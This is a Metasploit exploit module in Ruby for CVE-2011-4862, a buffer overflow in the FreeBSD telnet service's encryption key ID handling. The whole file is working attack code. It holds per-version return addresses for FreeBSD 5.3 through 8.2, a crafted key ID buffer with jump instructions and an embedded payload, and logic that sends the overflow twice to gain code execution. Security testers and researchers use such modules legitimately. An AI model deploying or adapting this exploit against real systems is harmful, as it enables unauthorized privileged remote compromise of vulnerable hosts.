FreeBSD Telnet Service Encyption Key ID Buffer Overflow

`##  
# $Id: $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::Telnet  
include Msf::Exploit::BruteTargets  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'FreeBSD Telnet Service Encyption Key ID Buffer Overflow',  
'Description' => %q{   
This module exploits a buffer overflow in the encryption option handler of the  
FreeBSD telnet service.  
},  
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>', 'Brandon Perry', 'Dan Rosenberg', 'hdm' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['BID', '51182'],  
['CVE', '2011-4862'],  
['URL', 'http://www.exploit-db.com/exploits/18280/']  
],  
'Privileged' => true,  
'Platform' => 'bsd',  
'Payload' =>  
{  
'Space' => 128,  
'BadChars' => "\x00",  
},  
  
'Targets' =>  
[  
[ 'Automatic', { } ],   
[ 'FreeBSD 8.2', { 'Ret' => 0x0804a8a9 } ], # call edx  
[ 'FreeBSD 8.1', { 'Ret' => 0x0804a889 } ], # call edx  
[ 'FreeBSD 8.0', { 'Ret' => 0x0804a869 } ], # call edx  
[ 'FreeBSD 7.3/7.4', { 'Ret' => 0x08057bd0 } ], # call edx  
[ 'FreeBSD 7.0/7.1/7.2', { 'Ret' => 0x0804c4e0 } ], # call edx  
[ 'FreeBSD 6.3/6.4', { 'Ret' => 0x0804a5b4 } ], # call edx  
[ 'FreeBSD 6.0/6.1/6.2', { 'Ret' => 0x08052925 } ], # call edx   
[ 'FreeBSD 5.5', { 'Ret' => 0x0804cf31 } ], # call edx  
# [ 'FreeBSD 5.4', { 'Ret' => 0x08050006 } ] # Version 5.4 does not seem to be exploitable (the crypto() function is not called)  
[ 'FreeBSD 5.3', { 'Ret' => 0x8059730 } ], # direct return  
# Versions 5.2 and below do not support encyption  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => ''))  
end  
  
def exploit_target(t)  
  
connect  
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)  
print_status(banner_sanitized) if datastore['VERBOSE']  
  
enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0"  
enc_keyid = "\xff\xfa\x26\x07"  
end_suboption = "\xff\xf0"  
  
# Telnet protocol requires 0xff to be escaped with another  
penc = payload.encoded.gsub("\xff", "\xff\xff")  
  
key_id = Rex::Text.rand_text_alphanumeric(400)  
key_id[ 0, 2] = "\xeb\x76"   
key_id[72, 4] = [ t['Ret'] - 20 ].pack("V")  
key_id[76, 4] = [ t['Ret'] ].pack("V")   
  
# Some of these bytes can get mangled, jump over them  
key_id[80,112] = Rex::Text.rand_text_alphanumeric(112)  
  
# Bounce to the real payload (avoid corruption)  
key_id[120, 2] = "\xeb\x46"  
  
# The actual payload  
key_id[192, penc.length] = penc  
  
# Create the Key ID command  
sploit = enc_keyid + key_id + end_suboption  
  
# Initiate encryption  
sock.put(enc_init)  
  
# Wait for a successful response  
loop do  
data = sock.get_once(-1, 5) rescue nil  
if not data  
raise RuntimeError, "This system does not support encryption"  
end  
break if data.index("\xff\xfa\x26\x02\x01")  
end  
  
# The first request smashes the pointer  
print_status("Sending first payload")  
sock.put(sploit)   
  
# Make sure the server replied to the first request  
data = sock.get_once(-1, 5)  
unless data  
print_status("Server did not respond to first payload")  
return  
end  
  
# Some delay between each request seems necessary in some cases  
::IO.select(nil, nil, nil, 0.5)  
  
# The second request results in the pointer being called  
print_status("Sending second payload...")  
sock.put(sploit)  
  
handler  
  
::IO.select(nil, nil, nil, 0.5)  
disconnect  
end  
  
end  
`